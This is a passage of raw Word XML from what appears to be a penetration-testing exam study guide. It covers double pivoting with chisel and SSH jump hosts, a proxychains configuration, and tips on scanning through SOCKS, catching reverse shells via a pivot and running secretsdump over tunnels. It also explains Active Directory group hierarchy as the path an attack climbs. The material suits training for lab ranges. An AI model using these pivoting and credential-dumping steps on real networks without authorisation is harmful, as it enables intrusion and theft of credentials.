    <w:p w14:paraId="24EFFD02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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>sT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> 172.16.30.30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C9F797" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chisel:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> run a second reverse-SOCKS from PIVOT-2 back </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>through</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> the first tunnel (chain </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> configs) so egress is PIVOT-1 → PIVOT-2 → tier-3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SSH:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ssh -J user@PIVOT1 user@PIVOT2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> then </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-D 1081</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> from PIVOT-2 (second SOCKS), or nest </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-L</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> forwards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502C28BB" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reflex that always works:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> foothold → find next NIC/subnet → route/SOCKS through this hop → enumerate the new segment → compromise a dual-homed host in it → repeat. Maintain the "host → segments" map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492375B6" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:pict w14:anchorId="56457AB4">
          <v:rect id="_x0000_i1197" style="width:0;height:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7067908B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 xml:space="preserve">10. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Setup &amp; Pivot Reliability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502124FF" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Config (/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/proxychains4.conf):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22953842" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>use</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> ONE mode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519C0BD9" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>strict_chain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">          # go through every proxy in order (default; good for a single hop)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7F75CC" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>dynamic_chain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">       # skip dead proxies (useful when chaining multiple)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D6F784" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>proxy_dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">             # resolve names through the proxy (avoid DNS leaks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE245B6" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>ProxyList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56995140" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">socks5 127.0.0.1 1080         # your ssh -D / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> / chisel SOCKS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CEE116" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t># double pivot -&gt; add the second SOCKS below the first (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>dynamic_chain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659DE4DA" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t># socks5 127.0.0.1 1081</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7561738E" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reliability tips (where exam time is lost):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369B1229" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> over </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> — SYN scans and host-discovery don't traverse SOCKS; full-connect + skip-ping is mandatory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7614873B" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Prefer reverse SOCKS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> (chisel </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R:socks</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>socks_proxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>) through NAT/egress-filtered ranges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C94E88F" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Keep callbacks in-segment:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> set </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LHOST</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> to the pivot's internal NIC, or catch shells via a </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>remote forward</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> (§5) — a reverse shell to your external IP won't route from a deep segment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AA6ED2" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>One tool per SOCKS hop</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> can be slow — for AD, run </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bloodhound-python</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>secretsdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> directly over the SOCKS rather than </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>proxychaining</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> a GUI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706A42F5" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Test the tunnel</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> with a known port first: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> curl -s http://172.16.20.20</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> before launching big scans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37979496" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:pict w14:anchorId="42811D36">
          <v:rect id="_x0000_i1198" style="width:0;height:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2C0167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>11. Active Directory Range — Concepts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3EAE20" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Trees &amp; Forests:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAAD611" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tree</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> — domains sharing a contiguous namespace (</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>red.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sub.red.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">): naming continuity only; </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>each domain is administratively independent</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> — a tree does </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> imply cross-domain control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E33F36" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Forest</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> — one or more trees joined (</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>red.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sub.red.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>blue.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t>); the forest is the top security boundary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFCF055" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Permission vs Privilege (Right):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459CAE11" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Permission</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> — access control over </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> (files, registry).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CE9D11" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Privilege / Right</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> — control over the </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> (what a token may do); the </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>State</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> column in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> /priv</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6C5550" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">"Maximum power" = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Full Control over every object AND every OS right</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A11CA7C" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Group hierarchy (the AD attack is climbing this):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7791CA84" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">Administrators  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">   (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>local, incl. on the DC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F131121" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">  - most powerful group on THAT machine; on the DC it runs the DC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0984FD7A" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">Domain Admins   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">   (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>domain)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFCE6AB" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">  - most powerful in the DOMAIN; when a machine joins the domain, Domain Admins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2A148B" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">    are ADDED to that machine</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>'s local Administrators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B632450" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">    (net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>localgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> administrators) -&gt; DA is admin on every domain member.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6574E8CD" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">Enterprise </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>Admins  (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>forest)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5113F536" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">  - highest logical authority; a member of EVERY domain</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>'s DC Administrators;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B2F24F" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">    exists ONLY in the forest-root domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D06846F" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
